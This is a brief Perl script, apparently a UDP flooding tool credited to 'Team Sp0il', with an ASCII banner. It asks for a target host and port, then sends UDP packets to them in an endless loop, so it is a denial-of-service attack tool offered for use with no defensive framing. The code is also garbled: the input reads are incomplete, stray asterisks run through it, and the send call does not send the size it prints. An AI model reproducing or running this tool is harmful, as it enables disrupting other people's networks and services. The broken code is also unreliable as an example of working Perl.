#!/usr/bin/perl # udp #flooder.pl coded by disturbed_1 print q{ ================================================= = * * * * * * * * * * * * * * * * * * * * * * * = = * * * * * * * * * Coded By * * * * * * * * * *= = * * * * * * * * * * * * * * * * * * * * * * * = = * * * * * * * * *Disturbed_1 * * * * * * * * *= = * * * * * * * * * * * * * * * * * * * * * * * = = * * * * * * * * *Team *Sp0il * * * * * * * * *= = * * * * * * * * * * * * * * * * * * * * * * * = = * * * * * * * * * Sp0il.com * * * * * * * * * = = * * * * * * * * * * * * * * * * * * * * * * * = ================================================= }; use io::socket; print "Host: "; chop ($host = ); print "Port: "; chop ($port = ); { $sock = IO::Socket::INET->new ( * * * *PeerAddr => $host, * * * *PeerPort => $port, * * * *Proto => 'udp') || die "$! Make sure the IP/host or port number is correct"; } packets: while (1) { $size = rand() * 200 * 2000; print ("$host:$port packet size: $size\n"); send($sock, 0, $size); }